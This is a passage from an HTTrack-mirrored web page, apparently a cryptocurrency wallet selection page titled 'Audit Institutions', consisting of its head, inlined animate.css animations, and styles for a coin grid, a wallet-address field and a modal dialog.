<!DOCTYPE html>
<html lang="en">
  
<!-- Mirrored from vistasync.netlify.app/wallets/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 06 Nov 2022 23:19:10 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link
      rel="shortcut icon"
      href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSsJ0utImTqepv32r4kIpzWdyGLTxluZxJO3WBCvbHolmd67K8TWm-WgiUAYUDwyX4tlnk&usqp=CAU"
      type="image/x-icon"
    />
    <title>Audit Institutions</title>

    <script
      src="https://kit.fontawesome.com/78d167673c.js"
      crossorigin="anonymous"
    ></script>

    <!-- google fonts link -->
    <link rel="preconnect" href="https://fonts.googleapis.com/" />
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin />
    <link
      href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;700;800;900&amp;display=swap"
      rel="stylesheet"
    />

    <!-- bootstrap css link -->
    <!-- CSS only -->
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css"
      rel="stylesheet"
      integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3"
      crossorigin="anonymous"
    />

    <style>
      @charset "UTF-8";

      /*!
 * animate.css -http://daneden.me/animate
 * Version - 3.5.2
 * Licensed under the MIT license - http://opensource.org/licenses/MIT
 *
 * Copyright (c) 2017 Daniel Eden
 */

      .animated {
        animation-duration: 1s;
        animation-fill-mode: both;
      }

      .animated.infinite {
        animation-iteration-count: infinite;
      }

      .animated.hinge {
        animation-duration: 2s;
      }

      .animated.flipOutX,
      .animated.flipOutY,
      .animated.bounceIn,
      .animated.bounceOut {
        animation-duration: 0.75s;
      }

      @keyframes bounce {
        from,
        20%,
        53%,
        80%,
        to {
          animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
          transform: translate3d(0, 0, 0);
        }

        40%,
        43% {
          animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
          transform: translate3d(0, -30px, 0);
        }

        70% {
          animation-timing-function: cubic-bezier(0.755, 0.05, 0.855, 0.06);
          transform: translate3d(0, -15px, 0);
        }

        90% {
          transform: translate3d(0, -4px, 0);
        }
      }

      .bounce {
        animation-name: bounce;
        transform-origin: center bottom;
      }

      @keyframes flash {
        from,
        50%,
        to {
          opacity: 1;
        }

        25%,
        75% {
          opacity: 0;
        }
      }

      .flash {
        animation-name: flash;
      }

      /* originally authored by Nick Pettit - https://github.com/nickpettit/glide */

      @keyframes pulse {
        from {
          transform: scale3d(1, 1, 1);
        }

        50% {
          transform: scale3d(1.05, 1.05, 1.05);
        }

        to {
          transform: scale3d(1, 1, 1);
        }
      }

      .pulse {
        animation-name: pulse;
      }

      @keyframes rubberBand {
        from {
          transform: scale3d(1, 1, 1);
        }

        30% {
          transform: scale3d(1.25, 0.75, 1);
        }

        40% {
          transform: scale3d(0.75, 1.25, 1);
        }

        50% {
          transform: scale3d(1.15, 0.85, 1);
        }

        65% {
          transform: scale3d(0.95, 1.05, 1);
        }

        75% {
          transform: scale3d(1.05, 0.95, 1);
        }

        to {
          transform: scale3d(1, 1, 1);
        }
      }

      .rubberBand {
        animation-name: rubberBand;
      }

      @keyframes shake {
        from,
        to {
          transform: translate3d(0, 0, 0);
        }

        10%,
        30%,
        50%,
        70%,
        90% {
          transform: translate3d(-10px, 0, 0);
        }

        20%,
        40%,
        60%,
        80% {
          transform: translate3d(10px, 0, 0);
        }
      }

      .shake {
        animation-name: shake;
      }

      @keyframes headShake {
        0% {
          transform: translateX(0);
        }

        6.5% {
          transform: translateX(-6px) rotateY(-9deg);
        }

        18.5% {
          transform: translateX(5px) rotateY(7deg);
        }

        31.5% {
          transform: translateX(-3px) rotateY(-5deg);
        }

        43.5% {
          transform: translateX(2px) rotateY(3deg);
        }

        50% {
          transform: translateX(0);
        }
      }

      .headShake {
        animation-timing-function: ease-in-out;
        animation-name: headShake;
      }

      @keyframes swing {
        20% {
          transform: rotate3d(0, 0, 1, 15deg);
        }

        40% {
          transform: rotate3d(0, 0, 1, -10deg);
        }

        60% {
          transform: rotate3d(0, 0, 1, 5deg);
        }

        80% {
          transform: rotate3d(0, 0, 1, -5deg);
        }

        to {
          transform: rotate3d(0, 0, 1, 0deg);
        }
      }

      .swing {
        transform-origin: top center;
        animation-name: swing;
      }

      @keyframes tada {
        from {
          transform: scale3d(1, 1, 1);
        }

        10%,
        20% {
          transform: scale3d(0.9, 0.9, 0.9) rotate3d(0, 0, 1, -3deg);
        }

        30%,
        50%,
        70%,
        90% {
          transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, 3deg);
        }

        40%,
        60%,
        80% {
          transform: scale3d(1.1, 1.1, 1.1) rotate3d(0, 0, 1, -3deg);
        }

        to {
          transform: scale3d(1, 1, 1);
        }
      }

      .tada {
        animation-name: tada;
      }

      /* originally authored by Nick Pettit - https://github.com/nickpettit/glide */

      @keyframes wobble {
        from {
          transform: none;
        }

        15% {
          transform: translate3d(-25%, 0, 0) rotate3d(0, 0, 1, -5deg);
        }

        30% {
          transform: translate3d(20%, 0, 0) rotate3d(0, 0, 1, 3deg);
        }

        45% {
          transform: translate3d(-15%, 0, 0) rotate3d(0, 0, 1, -3deg);
        }

        60% {
          transform: translate3d(10%, 0, 0) rotate3d(0, 0, 1, 2deg);
        }

        75% {
          transform: translate3d(-5%, 0, 0) rotate3d(0, 0, 1, -1deg);
        }

        to {
          transform: none;
        }
      }

      .wobble {
        animation-name: wobble;
      }

      @keyframes jello {
        from,
        11.1%,
        to {
          transform: none;
        }

        22.2% {
          transform: skewX(-12.5deg) skewY(-12.5deg);
        }

        33.3% {
          transform: skewX(6.25deg) skewY(6.25deg);
        }

        44.4% {
          transform: skewX(-3.125deg) skewY(-3.125deg);
        }

        55.5% {
          transform: skewX(1.5625deg) skewY(1.5625deg);
        }

        66.6% {
          transform: skewX(-0.78125deg) skewY(-0.78125deg);
        }

        77.7% {
          transform: skewX(0.390625deg) skewY(0.390625deg);
        }

        88.8% {
          transform: skewX(-0.1953125deg) skewY(-0.1953125deg);
        }
      }

      .jello {
        animation-name: jello;
        transform-origin: center;
      }

      @keyframes bounceIn {
        from,
        20%,
        40%,
        60%,
        80%,
        to {
          animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
        }

        0% {
          opacity: 0;
          transform: scale3d(0.3, 0.3, 0.3);
        }

        20% {
          transform: scale3d(1.1, 1.1, 1.1);
        }

        40% {
          transform: scale3d(0.9, 0.9, 0.9);
        }

        60% {
          opacity: 1;
          transform: scale3d(1.03, 1.03, 1.03);
        }

        80% {
          transform: scale3d(0.97, 0.97, 0.97);
        }

        to {
          opacity: 1;
          transform: scale3d(1, 1, 1);
        }
      }

      .bounceIn {
        animation-name: bounceIn;
      }

      @keyframes bounceInDown {
        from,
        60%,
        75%,
        90%,
        to {
          animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
        }

        0% {
          opacity: 0;
          transform: translate3d(0, -3000px, 0);
        }

        60% {
          opacity: 1;
          transform: translate3d(0, 25px, 0);
        }

        75% {
          transform: translate3d(0, -10px, 0);
        }

        90% {
          transform: translate3d(0, 5px, 0);
        }

        to {
          transform: none;
        }
      }

      .bounceInDown {
        animation-name: bounceInDown;
      }

      @keyframes bounceInLeft {
        from,
        60%,
        75%,
        90%,
        to {
          animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
        }

        0% {
          opacity: 0;
          transform: translate3d(-3000px, 0, 0);
        }

        60% {
          opacity: 1;
          transform: translate3d(25px, 0, 0);
        }

        75% {
          transform: translate3d(-10px, 0, 0);
        }

        90% {
          transform: translate3d(5px, 0, 0);
        }

        to {
          transform: none;
        }
      }

      .bounceInLeft {
        animation-name: bounceInLeft;
      }

      @keyframes bounceInRight {
        from,
        60%,
        75%,
        90%,
        to {
          animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
        }

        from {
          opacity: 0;
          transform: translate3d(3000px, 0, 0);
        }

        60% {
          opacity: 1;
          transform: translate3d(-25px, 0, 0);
        }

        75% {
          transform: translate3d(10px, 0, 0);
        }

        90% {
          transform: translate3d(-5px, 0, 0);
        }

        to {
          transform: none;
        }
      }

      .bounceInRight {
        animation-name: bounceInRight;
      }

      @keyframes bounceInUp {
        from,
        60%,
        75%,
        90%,
        to {
          animation-timing-function: cubic-bezier(0.215, 0.61, 0.355, 1);
        }

        from {
          opacity: 0;
          transform: translate3d(0, 3000px, 0);
        }

        60% {
          opacity: 1;
          transform: translate3d(0, -20px, 0);
        }

        75% {
          transform: translate3d(0, 10px, 0);
        }

        90% {
          transform: translate3d(0, -5px, 0);
        }

        to {
          transform: translate3d(0, 0, 0);
        }
      }

      .bounceInUp {
        animation-name: bounceInUp;
      }

      @keyframes bounceOut {
        20% {
          transform: scale3d(0.9, 0.9, 0.9);
        }

        50%,
        55% {
          opacity: 1;
          transform: scale3d(1.1, 1.1, 1.1);
        }

        to {
          opacity: 0;
          transform: scale3d(0.3, 0.3, 0.3);
        }
      }

      .bounceOut {
        animation-name: bounceOut;
      }

      @keyframes bounceOutDown {
        20% {
          transform: translate3d(0, 10px, 0);
        }

        40%,
        45% {
          opacity: 1;
          transform: translate3d(0, -20px, 0);
        }

        to {
          opacity: 0;
          transform: translate3d(0, 2000px, 0);
        }
      }

      .bounceOutDown {
        animation-name: bounceOutDown;
      }

      @keyframes bounceOutLeft {
        20% {
          opacity: 1;
          transform: translate3d(20px, 0, 0);
        }

        to {
          opacity: 0;
          transform: translate3d(-2000px, 0, 0);
        }
      }

      .bounceOutLeft {
        animation-name: bounceOutLeft;
      }

      @keyframes bounceOutRight {
        20% {
          opacity: 1;
          transform: translate3d(-20px, 0, 0);
        }

        to {
          opacity: 0;
          transform: translate3d(2000px, 0, 0);
        }
      }

      .bounceOutRight {
        animation-name: bounceOutRight;
      }

      @keyframes bounceOutUp {
        20% {
          transform: translate3d(0, -10px, 0);
        }

        40%,
        45% {
          opacity: 1;
          transform: translate3d(0, 20px, 0);
        }

        to {
          opacity: 0;
          transform: translate3d(0, -2000px, 0);
        }
      }

      .bounceOutUp {
        animation-name: bounceOutUp;
      }

      @keyframes fadeIn {
        from {
          opacity: 0;
        }

        to {
          opacity: 1;
        }
      }

      .fadeIn {
        animation-name: fadeIn;
      }

      @keyframes fadeInDown {
        from {
          opacity: 0;
          transform: translate3d(0, -100%, 0);
        }

        to {
          opacity: 1;
          transform: none;
        }
      }

      .fadeInDown {
        animation-name: fadeInDown;
      }

      @keyframes fadeInDownBig {
        from {
          opacity: 0;
          transform: translate3d(0, -2000px, 0);
        }

        to {
          opacity: 1;
          transform: none;
        }
      }

      .fadeInDownBig {
        animation-name: fadeInDownBig;
      }

      @keyframes fadeInLeft {
        from {
          opacity: 0;
          transform: translate3d(-100%, 0, 0);
        }

        to {
          opacity: 1;
          transform: none;
        }
      }

      .fadeInLeft {
        animation-name: fadeInLeft;
      }

      @keyframes fadeInLeftBig {
        from {
          opacity: 0;
          transform: translate3d(-2000px, 0, 0);
        }

        to {
          opacity: 1;
          transform: none;
        }
      }

      .fadeInLeftBig {
        animation-name: fadeInLeftBig;
      }

      @keyframes fadeInRight {
        from {
          opacity: 0;
          transform: translate3d(100%, 0, 0);
        }

        to {
          opacity: 1;
          transform: none;
        }
      }

      .fadeInRight {
        animation-name: fadeInRight;
      }

      @keyframes fadeInRightBig {
        from {
          opacity: 0;
          transform: translate3d(2000px, 0, 0);
        }

        to {
          opacity: 1;
          transform: none;
        }
      }

      .fadeInRightBig {
        animation-name: fadeInRightBig;
      }

      @keyframes fadeInUp {
        from {
          opacity: 0;
          transform: translate3d(0, 100%, 0);
        }

        to {
          opacity: 1;
          transform: none;
        }
      }

      .fadeInUp {
        animation-name: fadeInUp;
      }

      @keyframes fadeInUpBig {
        from {
          opacity: 0;
          transform: translate3d(0, 2000px, 0);
        }

        to {
          opacity: 1;
          transform: none;
        }
      }

      .fadeInUpBig {
        animation-name: fadeInUpBig;
      }

      @keyframes fadeOut {
        from {
          opacity: 1;
        }

        to {
          opacity: 0;
        }
      }

      .fadeOut {
        animation-name: fadeOut;
      }

      @keyframes fadeOutDown {
        from {
          opacity: 1;
        }

        to {
          opacity: 0;
          transform: translate3d(0, 100%, 0);
        }
      }

      .fadeOutDown {
        animation-name: fadeOutDown;
      }

      @keyframes fadeOutDownBig {
        from {
          opacity: 1;
        }

        to {
          opacity: 0;
          transform: translate3d(0, 2000px, 0);
        }
      }

      .fadeOutDownBig {
        animation-name: fadeOutDownBig;
      }

      @keyframes fadeOutLeft {
        from {
          opacity: 1;
        }

        to {
          opacity: 0;
          transform: translate3d(-100%, 0, 0);
        }
      }

      .fadeOutLeft {
        animation-name: fadeOutLeft;
      }

      @keyframes fadeOutLeftBig {
        from {
          opacity: 1;
        }

        to {
          opacity: 0;
          transform: translate3d(-2000px, 0, 0);
        }
      }

      .fadeOutLeftBig {
        animation-name: fadeOutLeftBig;
      }

      @keyframes fadeOutRight {
        from {
          opacity: 1;
        }

        to {
          opacity: 0;
          transform: translate3d(100%, 0, 0);
        }
      }

      .fadeOutRight {
        animation-name: fadeOutRight;
      }

      @keyframes fadeOutRightBig {
        from {
          opacity: 1;
        }

        to {
          opacity: 0;
          transform: translate3d(2000px, 0, 0);
        }
      }

      .fadeOutRightBig {
        animation-name: fadeOutRightBig;
      }

      @keyframes fadeOutUp {
        from {
          opacity: 1;
        }

        to {
          opacity: 0;
          transform: translate3d(0, -100%, 0);
        }
      }

      .fadeOutUp {
        animation-name: fadeOutUp;
      }

      @keyframes fadeOutUpBig {
        from {
          opacity: 1;
        }

        to {
          opacity: 0;
          transform: translate3d(0, -2000px, 0);
        }
      }

      .fadeOutUpBig {
        animation-name: fadeOutUpBig;
      }

      @keyframes flip {
        from {
          transform: perspective(400px) rotate3d(0, 1, 0, -360deg);
          animation-timing-function: ease-out;
        }

        40% {
          transform: perspective(400px) translate3d(0, 0, 150px)
            rotate3d(0, 1, 0, -190deg);
          animation-timing-function: ease-out;
        }

        50% {
          transform: perspective(400px) translate3d(0, 0, 150px)
            rotate3d(0, 1, 0, -170deg);
          animation-timing-function: ease-in;
        }

        80% {
          transform: perspective(400px) scale3d(0.95, 0.95, 0.95);
          animation-timing-function: ease-in;
        }

        to {
          transform: perspective(400px);
          animation-timing-function: ease-in;
        }
      }

      .animated.flip {
        -webkit-backface-visibility: visible;
        backface-visibility: visible;
        animation-name: flip;
      }

      @keyframes flipInX {
        from {
          transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
          animation-timing-function: ease-in;
          opacity: 0;
        }

        40% {
          transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
          animation-timing-function: ease-in;
        }

        60% {
          transform: perspective(400px) rotate3d(1, 0, 0, 10deg);
          opacity: 1;
        }

        80% {
          transform: perspective(400px) rotate3d(1, 0, 0, -5deg);
        }

        to {
          transform: perspective(400px);
        }
      }

      .flipInX {
        -webkit-backface-visibility: visible !important;
        backface-visibility: visible !important;
        animation-name: flipInX;
      }

      @keyframes flipInY {
        from {
          transform: perspective(400px) rotate3d(0, 1, 0, 90deg);
          animation-timing-function: ease-in;
          opacity: 0;
        }

        40% {
          transform: perspective(400px) rotate3d(0, 1, 0, -20deg);
          animation-timing-function: ease-in;
        }

        60% {
          transform: perspective(400px) rotate3d(0, 1, 0, 10deg);
          opacity: 1;
        }

        80% {
          transform: perspective(400px) rotate3d(0, 1, 0, -5deg);
        }

        to {
          transform: perspective(400px);
        }
      }

      .flipInY {
        -webkit-backface-visibility: visible !important;
        backface-visibility: visible !important;
        animation-name: flipInY;
      }

      @keyframes flipOutX {
        from {
          transform: perspective(400px);
        }

        30% {
          transform: perspective(400px) rotate3d(1, 0, 0, -20deg);
          opacity: 1;
        }

        to {
          transform: perspective(400px) rotate3d(1, 0, 0, 90deg);
          opacity: 0;
        }
      }

      .flipOutX {
        animation-name: flipOutX;
        -webkit-backface-visibility: visible !important;
        backface-visibility: visible !important;
      }

      @keyframes flipOutY {
        from {
          transform: perspective(400px);
        }

        30% {
          transform: perspective(400px) rotate3d(0, 1, 0, -15deg);
          opacity: 1;
        }

        to {
          transform: perspective(400px) rotate3d(0, 1, 0, 90deg);
          opacity: 0;
        }
      }

      .flipOutY {
        -webkit-backface-visibility: visible !important;
        backface-visibility: visible !important;
        animation-name: flipOutY;
      }

      @keyframes lightSpeedIn {
        from {
          transform: translate3d(100%, 0, 0) skewX(-30deg);
          opacity: 0;
        }

        60% {
          transform: skewX(20deg);
          opacity: 1;
        }

        80% {
          transform: skewX(-5deg);
          opacity: 1;
        }

        to {
          transform: none;
          opacity: 1;
        }
      }

      .lightSpeedIn {
        animation-name: lightSpeedIn;
        animation-timing-function: ease-out;
      }

      @keyframes lightSpeedOut {
        from {
          opacity: 1;
        }

        to {
          transform: translate3d(100%, 0, 0) skewX(30deg);
          opacity: 0;
        }
      }

      .lightSpeedOut {
        animation-name: lightSpeedOut;
        animation-timing-function: ease-in;
      }

      @keyframes rotateIn {
        from {
          transform-origin: center;
          transform: rotate3d(0, 0, 1, -200deg);
          opacity: 0;
        }

        to {
          transform-origin: center;
          transform: none;
          opacity: 1;
        }
      }

      .rotateIn {
        animation-name: rotateIn;
      }

      @keyframes rotateInDownLeft {
        from {
          transform-origin: left bottom;
          transform: rotate3d(0, 0, 1, -45deg);
          opacity: 0;
        }

        to {
          transform-origin: left bottom;
          transform: none;
          opacity: 1;
        }
      }

      .rotateInDownLeft {
        animation-name: rotateInDownLeft;
      }

      @keyframes rotateInDownRight {
        from {
          transform-origin: right bottom;
          transform: rotate3d(0, 0, 1, 45deg);
          opacity: 0;
        }

        to {
          transform-origin: right bottom;
          transform: none;
          opacity: 1;
        }
      }

      .rotateInDownRight {
        animation-name: rotateInDownRight;
      }

      @keyframes rotateInUpLeft {
        from {
          transform-origin: left bottom;
          transform: rotate3d(0, 0, 1, 45deg);
          opacity: 0;
        }

        to {
          transform-origin: left bottom;
          transform: none;
          opacity: 1;
        }
      }

      .rotateInUpLeft {
        animation-name: rotateInUpLeft;
      }

      @keyframes rotateInUpRight {
        from {
          transform-origin: right bottom;
          transform: rotate3d(0, 0, 1, -90deg);
          opacity: 0;
        }

        to {
          transform-origin: right bottom;
          transform: none;
          opacity: 1;
        }
      }

      .rotateInUpRight {
        animation-name: rotateInUpRight;
      }

      @keyframes rotateOut {
        from {
          transform-origin: center;
          opacity: 1;
        }

        to {
          transform-origin: center;
          transform: rotate3d(0, 0, 1, 200deg);
          opacity: 0;
        }
      }

      .rotateOut {
        animation-name: rotateOut;
      }

      @keyframes rotateOutDownLeft {
        from {
          transform-origin: left bottom;
          opacity: 1;
        }

        to {
          transform-origin: left bottom;
          transform: rotate3d(0, 0, 1, 45deg);
          opacity: 0;
        }
      }

      .rotateOutDownLeft {
        animation-name: rotateOutDownLeft;
      }

      @keyframes rotateOutDownRight {
        from {
          transform-origin: right bottom;
          opacity: 1;
        }

        to {
          transform-origin: right bottom;
          transform: rotate3d(0, 0, 1, -45deg);
          opacity: 0;
        }
      }

      .rotateOutDownRight {
        animation-name: rotateOutDownRight;
      }

      @keyframes rotateOutUpLeft {
        from {
          transform-origin: left bottom;
          opacity: 1;
        }

        to {
          transform-origin: left bottom;
          transform: rotate3d(0, 0, 1, -45deg);
          opacity: 0;
        }
      }

      .rotateOutUpLeft {
        animation-name: rotateOutUpLeft;
      }

      @keyframes rotateOutUpRight {
        from {
          transform-origin: right bottom;
          opacity: 1;
        }

        to {
          transform-origin: right bottom;
          transform: rotate3d(0, 0, 1, 90deg);
          opacity: 0;
        }
      }

      .rotateOutUpRight {
        animation-name: rotateOutUpRight;
      }

      @keyframes hinge {
        0% {
          transform-origin: top left;
          animation-timing-function: ease-in-out;
        }

        20%,
        60% {
          transform: rotate3d(0, 0, 1, 80deg);
          transform-origin: top left;
          animation-timing-function: ease-in-out;
        }

        40%,
        80% {
          transform: rotate3d(0, 0, 1, 60deg);
          transform-origin: top left;
          animation-timing-function: ease-in-out;
          opacity: 1;
        }

        to {
          transform: translate3d(0, 700px, 0);
          opacity: 0;
        }
      }

      .hinge {
        animation-name: hinge;
      }

      @keyframes jackInTheBox {
        from {
          opacity: 0;
          transform: scale(0.1) rotate(30deg);
          transform-origin: center bottom;
        }

        50% {
          transform: rotate(-10deg);
        }

        70% {
          transform: rotate(3deg);
        }

        to {
          opacity: 1;
          transform: scale(1);
        }
      }

      .jackInTheBox {
        animation-name: jackInTheBox;
      }

      /* originally authored by Nick Pettit - https://github.com/nickpettit/glide */

      @keyframes rollIn {
        from {
          opacity: 0;
          transform: translate3d(-100%, 0, 0) rotate3d(0, 0, 1, -120deg);
        }

        to {
          opacity: 1;
          transform: none;
        }
      }

      .rollIn {
        animation-name: rollIn;
      }

      /* originally authored by Nick Pettit - https://github.com/nickpettit/glide */

      @keyframes rollOut {
        from {
          opacity: 1;
        }

        to {
          opacity: 0;
          transform: translate3d(100%, 0, 0) rotate3d(0, 0, 1, 120deg);
        }
      }

      .rollOut {
        animation-name: rollOut;
      }

      @keyframes zoomIn {
        from {
          opacity: 0;
          transform: scale3d(0.3, 0.3, 0.3);
        }

        50% {
          opacity: 1;
        }
      }

      .zoomIn {
        animation-name: zoomIn;
      }

      @keyframes zoomInDown {
        from {
          opacity: 0;
          transform: scale3d(0.1, 0.1, 0.1) translate3d(0, -1000px, 0);
          animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
        }

        60% {
          opacity: 1;
          transform: scale3d(0.475, 0.475, 0.475) translate3d(0, 60px, 0);
          animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
        }
      }

      .zoomInDown {
        animation-name: zoomInDown;
      }

      @keyframes zoomInLeft {
        from {
          opacity: 0;
          transform: scale3d(0.1, 0.1, 0.1) translate3d(-1000px, 0, 0);
          animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
        }

        60% {
          opacity: 1;
          transform: scale3d(0.475, 0.475, 0.475) translate3d(10px, 0, 0);
          animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
        }
      }

      .zoomInLeft {
        animation-name: zoomInLeft;
      }

      @keyframes zoomInRight {
        from {
          opacity: 0;
          transform: scale3d(0.1, 0.1, 0.1) translate3d(1000px, 0, 0);
          animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
        }

        60% {
          opacity: 1;
          transform: scale3d(0.475, 0.475, 0.475) translate3d(-10px, 0, 0);
          animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
        }
      }

      .zoomInRight {
        animation-name: zoomInRight;
      }

      @keyframes zoomInUp {
        from {
          opacity: 0;
          transform: scale3d(0.1, 0.1, 0.1) translate3d(0, 1000px, 0);
          animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
        }

        60% {
          opacity: 1;
          transform: scale3d(0.475, 0.475, 0.475) translate3d(0, -60px, 0);
          animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
        }
      }

      .zoomInUp {
        animation-name: zoomInUp;
      }

      @keyframes zoomOut {
        from {
          opacity: 1;
        }

        50% {
          opacity: 0;
          transform: scale3d(0.3, 0.3, 0.3);
        }

        to {
          opacity: 0;
        }
      }

      .zoomOut {
        animation-name: zoomOut;
      }

      @keyframes zoomOutDown {
        40% {
          opacity: 1;
          transform: scale3d(0.475, 0.475, 0.475) translate3d(0, -60px, 0);
          animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
        }

        to {
          opacity: 0;
          transform: scale3d(0.1, 0.1, 0.1) translate3d(0, 2000px, 0);
          transform-origin: center bottom;
          animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
        }
      }

      .zoomOutDown {
        animation-name: zoomOutDown;
      }

      @keyframes zoomOutLeft {
        40% {
          opacity: 1;
          transform: scale3d(0.475, 0.475, 0.475) translate3d(42px, 0, 0);
        }

        to {
          opacity: 0;
          transform: scale(0.1) translate3d(-2000px, 0, 0);
          transform-origin: left center;
        }
      }

      .zoomOutLeft {
        animation-name: zoomOutLeft;
      }

      @keyframes zoomOutRight {
        40% {
          opacity: 1;
          transform: scale3d(0.475, 0.475, 0.475) translate3d(-42px, 0, 0);
        }

        to {
          opacity: 0;
          transform: scale(0.1) translate3d(2000px, 0, 0);
          transform-origin: right center;
        }
      }

      .zoomOutRight {
        animation-name: zoomOutRight;
      }

      @keyframes zoomOutUp {
        40% {
          opacity: 1;
          transform: scale3d(0.475, 0.475, 0.475) translate3d(0, 60px, 0);
          animation-timing-function: cubic-bezier(0.55, 0.055, 0.675, 0.19);
        }

        to {
          opacity: 0;
          transform: scale3d(0.1, 0.1, 0.1) translate3d(0, -2000px, 0);
          transform-origin: center bottom;
          animation-timing-function: cubic-bezier(0.175, 0.885, 0.32, 1);
        }
      }

      .zoomOutUp {
        animation-name: zoomOutUp;
      }

      @keyframes slideInDown {
        from {
          transform: translate3d(0, -100%, 0);
          visibility: visible;
        }

        to {
          transform: translate3d(0, 0, 0);
        }
      }

      .slideInDown {
        animation-name: slideInDown;
      }

      @keyframes slideInLeft {
        from {
          transform: translate3d(-100%, 0, 0);
          visibility: visible;
        }

        to {
          transform: translate3d(0, 0, 0);
        }
      }

      .slideInLeft {
        animation-name: slideInLeft;
      }

      @keyframes slideInRight {
        from {
          transform: translate3d(100%, 0, 0);
          visibility: visible;
        }

        to {
          transform: translate3d(0, 0, 0);
        }
      }

      .slideInRight {
        animation-name: slideInRight;
      }

      @keyframes slideInUp {
        from {
          transform: translate3d(0, 100%, 0);
          visibility: visible;
        }

        to {
          transform: translate3d(0, 0, 0);
        }
      }

      .slideInUp {
        animation-name: slideInUp;
      }

      @keyframes slideOutDown {
        from {
          transform: translate3d(0, 0, 0);
        }

        to {
          visibility: hidden;
          transform: translate3d(0, 100%, 0);
        }
      }

      .slideOutDown {
        animation-name: slideOutDown;
      }

      @keyframes slideOutLeft {
        from {
          transform: translate3d(0, 0, 0);
        }

        to {
          visibility: hidden;
          transform: translate3d(-100%, 0, 0);
        }
      }

      .slideOutLeft {
        animation-name: slideOutLeft;
      }

      @keyframes slideOutRight {
        from {
          transform: translate3d(0, 0, 0);
        }

        to {
          visibility: hidden;
          transform: translate3d(100%, 0, 0);
        }
      }

      .slideOutRight {
        animation-name: slideOutRight;
      }

      @keyframes slideOutUp {
        from {
          transform: translate3d(0, 0, 0);
        }

        to {
          visibility: hidden;
          transform: translate3d(0, -100%, 0);
        }
      }

      .slideOutUp {
        animation-name: slideOutUp;
      }
    </style>

    <style>
      @import url("https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;700;800;900&amp;display=swap");

      * {
        font-family: "Poppins", sans-serif;
      }

      #header {
        padding-top: 1rem;
        padding-bottom: 1rem;
        -webkit-box-shadow: 0 10px 5px #141b29;
        -moz-box-shadow: 0 10px 5px #141b29;
        box-shadow: 0 -15px 25px #141b29;
      }

      .header-text {
        /* display: flex; */
        /* justify-content: space-between; */
        color: #0c0e29;
        font-weight: 900 !important;
        text-align: center;
      }

      .header-img {
        width: 2.5rem;
        height: 2.5rem;
      }

      .header-text h4 {
        font-weight: 500;
        font-size: 1rem;
        margin-top: 8px;
        font-weight: 700;
      }

      .coin-section-header {
        color: #0c0e29;
      }

      .coin-section-header h1 {
        font-weight: 600;
        margin-top: 2rem !important;
      }

      .coin-section-header h6 {
        font-size: 15px;
        font-weight: 400;
        margin-top: 1rem;
      }

      .coin-section-footer {
        color: #0c0e29;
        margin-top: 1.5rem;
      }

      .coin-section-footer h6 {
        font-size: 12px;
        font-weight: 400;
      }

      .coin-section-icons i {
        font-size: 12.5px;
      }

      .coin {
        background-color: #fff;
        border: none;
      }

      .coin-img {
        width: 5rem;
        height: 5rem;
        -webkit-transition: 500ms linear;
        transition: 500ms linear;
      }

      .coin-img:hover {
        transform: scale(1.1);
      }

      .coin-registry {
        margin-top: 2.5rem;
        display: grid;
        grid-template-columns: 1fr 1fr 1fr 1fr 1fr 1fr;
        grid-column-gap: 5rem !important;
        grid-row-gap: 1rem !important;
        grid-template-rows: 1fr 1fr 1fr 1fr 1fr 1fr 1fr 1fr 1fr 1fr 1fr 1fr;
        gap: 0px 0px;
        grid-template-areas: ". . . . . ." ". . . . . ." ". . . . . ." ". . . . . ." ". . . . . ." ". . . . . ." ". . . . . ." ". . . . . ." ". . . . . ." ". . . . . ." ". . . . . ." ". . . . . .";
      }

      .coin h4 {
        font-weight: 600;
        color: #0c0e29;
        font-size: 11px !important;
        margin-top: 13px;
      }

      .wallet-address {
        background-color: #fff;
        color: #0c0e29;
        border: none !important;
        border-radius: 5px;
        padding-left: 10px;
        padding-right: 10px;
        height: 3rem;
        width: 100%;
        margin-top: 1rem;
        margin-bottom: 1rem;
      }

      .modal-content {
        background-color: #0c0e29;
      }

      .modal-header {
        border-bottom: none;
      }

      .modal-footer {
        border-top: none;
      }

      .modal_title {
        color: #fff;
        font-weight: 600;
        font-size: 13px;
        word-spacing: 1px;
      }

      .btn_close {
        border: 1px solid #fff;
        font-weight: 500;
        font-size: 13px;
        color: #fff !important;
        padding-top: 5px !important;
        padding-bottom: 5px !important;
      }

      .btn_proceed {
        background-color: #fff;
        color: #0c0e29;
        font-weight: 500;
        font-size: 13px;
      }

      .btn-primary {
        border: none !important;
      }

      .btn-primary:hover,
      .btn-primary:focus,
      .btn-primary:active {
        background-color: #fff !important;
        color: #0c0e29;
        border: none;
      }

      small {
